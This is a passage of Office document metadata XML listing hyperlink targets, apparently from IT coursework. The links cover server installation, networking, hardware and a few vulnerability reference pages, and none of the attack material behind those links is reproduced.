        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikipedia.org/wiki/List_of_MediaTek_processors</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4587523</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>777</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://academyofanimatedart.com/a-guide-to-the-best-computer-for-3d-modeling-and-rendering/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>589914</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.drivereasy.com/knowledge/fixed-bios-not-detecting-ssd-in-computer/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>:~:text=Solution%202%3A%20Configure%20the%20SSD,is%20not%20recognized%20by%20BIOS.&amp;text=Then%20you'll%20see%20SATA,your%20computer%20to%20enter%20BIOS</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2949172</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>771</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.darkwiki.in/top-5-operating-system-for-ethical-hacking-and-penetration-testing/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835025</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>768</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5242890</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>765</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114207</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>762</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://tech4fresher.com/best-wifi-analyzer-for-windows/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4456514</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>759</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://lt.phhsnews.com/how-do-ip-addresses-work5759</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114178</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>756</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274534</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>753</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://networklessons.com/switching/intervlan-routing</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2949216</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>750</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.archive.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>747</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.intel.com/content/www/us/en/products/processors/core.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>852054</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>744</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/windows-server/get-started-19/install-upgrade-migrate-19</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815781</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>741</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=mN12es1rbJ8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815781</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>738</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=mN12es1rbJ8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094854</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>735</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/install-one-computer?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>458836</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>732</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439576</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>729</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://instagram.com/legal/terms/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735586</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>726</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://community.cisco.com/t5/other-network-architecture/impact-of-frequent-power-outtage-to-catalyst-switches/td-p/360510</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063288</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>723</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.apple.com/legal/internet-services/icloud/en/terms.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7012407</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>720</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929958</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>717</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=3TPsuio8PP8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5963849</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>714</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/channel/UCP2uPp7TUXwJCicB0byzDnQ</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>327769</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>711</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://vitux.com/install-centos-with-virtualbox-on-windows/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2228325</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>708</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.fosslinux.com/7705/how-to-install-and-configure-zabbix-on-centos-7.htm</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4325443</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>705</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.logicalincrements.com/articles/building-pc-3d-rendering-animation</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4128806</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>702</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.logicalincrements.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4849691</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>699</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2621561</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>696</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.isecom.org/OSSTMM.3.pdf</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1638409</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>693</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.linuxbabe.com/redhat/install-nextcloud-rhel-8-centos-8-nginx-lemp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>327773</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>690</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/en-us/wdsi/threats</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6488106</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>687</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cgdirector.com/best-computer-3d-modeling-rendering/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735612</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>684</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.metageek.com/products/rampart-home/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179654</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>681</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.lifewire.com/how-to-fix-a-computer-that-wont-turn-on-2624450</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6029385</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>678</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.facebook.com/policies</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>196637</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>675</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966167</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>672</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.freedownloadmanager.org/Windows-PC/Ekahau-HeatMapper-FREE.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194330</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>669</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.dropbox.com/terms2014</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031711</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>666</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.virtualbox.org/wiki/Downloads</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4587579</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>663</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4784128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>660</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://app.diagrams.net/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7667772</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>657</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://techlog360.com/ddr1-ddr2-ddr3-ddr4-ram-differences/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274603</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>654</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://motionarray.com/learn/davinci-resolve/davinci-resolve-system-requirements/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2687020</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>651</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://motionarray.com/learn/davinci-resolve/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2752616</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>648</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.exploit-db.com/download/8572</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3866737</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>645</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.samba.org/samba/security/CVE-2007-2447.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3932205</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>642</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655366</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>639</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://support.corel.com/hc/en-us/articles/219326157-CorelDRAW-Graphics-Suite-X8-System-Requirements</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6422626</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>636</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computernetworkingnotes.com/ccna-study-guide/configure-vtp-server-and-client-in-switch.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439567</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>633</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5832726</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>630</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://cve.mitre.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2752621</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>627</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cisco.com/c/en/us/products/routers/product-listing.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4456536</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>624</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://us-cert.cisa.gov/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094928</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>621</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.ccleaner.com/knowledge/why-your-pc-is-so-slow-and-how-you-can-speed-it-up</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>:~:text=Your%20operating%20system%20has%20to,that%20are%20running%20on%20it.&amp;text=Too%20many%20background%20programs,on%20Windows%20or%20driver%20updates</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441794</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>618</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929904</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>615</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.amd.com/en/products/processors-desktop</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570647</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>612</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://kb.acronis.com/content/65468</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3539054</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>609</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.acronis.com/en-eu/homecomputing/thanks/acronis-true-image-2021/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7208993</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>606</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://askme4tech.com/acronis-true-image-2020-review-tutorial</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5898321</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>603</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://kb.acronis.com/content/61645</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7077920</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>600</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.networkstraining.com/best-network-diagram-software/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815757</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>597</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
